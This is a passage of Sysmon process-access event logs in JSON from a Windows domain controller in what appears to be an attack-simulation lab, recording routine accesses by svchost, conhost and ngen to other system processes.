{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-0010261D1300}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-0010261D1300}","TargetProcessId":"4572","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-00102B1E1300}\r\nTargetProcessId: 2696\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 